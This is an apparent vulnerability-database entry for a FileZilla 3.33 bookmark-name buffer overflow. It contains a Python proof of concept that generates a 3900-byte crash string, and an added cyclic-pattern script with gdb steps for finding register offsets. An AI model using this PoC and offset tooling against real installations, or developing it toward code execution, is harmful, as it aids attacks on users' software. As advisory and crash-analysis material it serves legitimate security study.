Vendor: FileZilla
By: Kağan Çapar
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: FileZilla
Affected Version From: 3.33
Affected Version To: 3.33
Patch Exists: YES
Related CWE: N/A
CPE: a:filezilla:filezilla:3.33
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux 2018.3 x64
Year: 2018

FileZilla 3.33 Buffer-Overflow (PoC)

A buffer overflow exists in FileZilla 3.33 that is reachable through the client's own Add Bookmark dialog: pasting a 3900-byte string into the Name field and confirming the dialog crashes the application, which points to missing length validation on that user-supplied input (CWE-119). The PoC on this page demonstrates the crash only. It does not show a controlled register or return address, so arbitrary code execution is a possibility the PoC does not establish, and the input is typed locally into the GUI rather than received over an FTP connection. Until a controlled crash is shown, treat this as a local denial of service rather than a remote code execution issue.

Mitigation:

Upgrade to FileZilla 3.45.1 or later (3.45.1 was the latest release when this entry was written).

Exploit-DB raw data:

# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-10
# Software Link: https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/filezilla/3.33.0-1/filezilla_3.33.0-1.debian.tar.xz
# Vendor Homepage: https://filezilla-project.org
# Tested Version: 3.33
# Tested on OS: Kali Linux 2018.3 x64
# Steps to Reproduce: Run the python exploit script; it will create a new
# file with the name "exploit.txt". Copy the content from "exploit.txt".
# Open a new terminal and write "filezilla".
# Go to Bookmarks and Add bookmark, or Ctrl + B.
# Now paste the contents of "exploit.txt" into the "Name:" field.
# Click "OK", then click "Bookmarks"; you will see a crash in the terminal.

#!/usr/bin/env python3
# Original PoC, ported from Python 2 print statements to Python 3; behaviour is unchanged.
# The payload is the 3-byte ASCII string "PHR" (\x50\x48\x52) repeated 1300 times,
# i.e. 3900 bytes, written to exploit.txt for pasting into the bookmark Name field.

buffer = "\x50\x48\x52" * 1300

payload = buffer
try:
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except OSError as err:
    # Report the actual reason (permissions, read-only directory, ...) instead of a bare except.
    print("File cannot be created: %s" % err)
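As an added example, not part of the original PoC and not FileZilla project code: the same 3900-byte exploit.txt generated as a de Bruijn cyclic pattern instead of "PHR" * 1300, together with the lookup that maps a register value taken from the crash back to its byte offset in the input. The original page only shows that FileZilla crashes; nothing on it shows a controlled register or return address, so the offset lookup is meaningful only if a debugger attached to the crash actually reports pattern bytes in a register or on the stack. The function names, the 62-symbol alphabet and the 3900-byte default are this example's own choices.

```python
#!/usr/bin/env python3
"""Cyclic-pattern variant of the FileZilla 3.33 bookmark-name PoC (added example).

Every 3-byte window of the generated string is unique, so any 4- or 8-byte value
that a crashing FileZilla leaves in a register or on the stack can be traced back
to exactly one offset in the pasted input.  Whether such a value exists is not
shown by the original PoC; this script only makes the question answerable.
"""
import string
from typing import Optional

# Assumption: the bookmark Name field accepts plain ASCII letters and digits.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits  # 62 symbols
PAYLOAD_LENGTH = 3900  # same size as the original "PHR" * 1300 payload


def de_bruijn(alphabet: str, n: int) -> str:
    """Return the de Bruijn sequence B(k, n) over `alphabet`, k = len(alphabet):
    every length-n string over the alphabet occurs exactly once (cyclically).
    Standard recursive construction; total length is k ** n."""
    k = len(alphabet)
    a = [0] * k * n
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def build_payload(length: int = PAYLOAD_LENGTH) -> str:
    """Prefix of B(62, 3) (238328 chars available).  Unique 3-byte windows imply
    unique 4-byte and 8-byte windows, so each register value maps to one offset."""
    seq = de_bruijn(ALPHABET, 3)
    if length > len(seq):
        raise ValueError(f"pattern length {length} exceeds {len(seq)}")
    return seq[:length]


def pattern_offset(pattern: str, value: int, width: int = 4) -> Optional[int]:
    """Map a register value read from the crash back to its offset in `pattern`.
    Little-endian is tried first (x86/x86-64), then big-endian.  Returns None when
    the bytes are not from the pattern, i.e. the crash is not input-controlled.
    Use width=8 for 64-bit registers."""
    for order in ("little", "big"):
        needle = value.to_bytes(width, order).decode("latin-1")
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


def write_payload(path: str = "exploit.txt", length: int = PAYLOAD_LENGTH) -> int:
    """Write the pattern to `path` (paste it into the bookmark Name field exactly as
    in the original steps) and return the number of bytes written."""
    payload = build_payload(length)
    with open(path, "w", encoding="ascii") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # usage: script.py <pattern-length> <0xREGISTER-VALUE-FROM-CRASH>
        pat = build_payload(int(sys.argv[1]))
        print(pattern_offset(pat, int(sys.argv[2], 16)))
    else:
        print(f"[+] wrote {write_payload()} bytes of cyclic pattern to exploit.txt")
```

Run it with no arguments to produce exploit.txt, reproduce the crash under gdb (`gdb -q filezilla`, then `run`), and if a register such as `rip`, `rsp`-pointed data or `rbp` holds bytes from the pattern, rerun the script with the pattern length and that value to get the offset. If every register holds unrelated values, the crash is an uncontrolled out-of-bounds access and the CVSS-style code execution claim has no support.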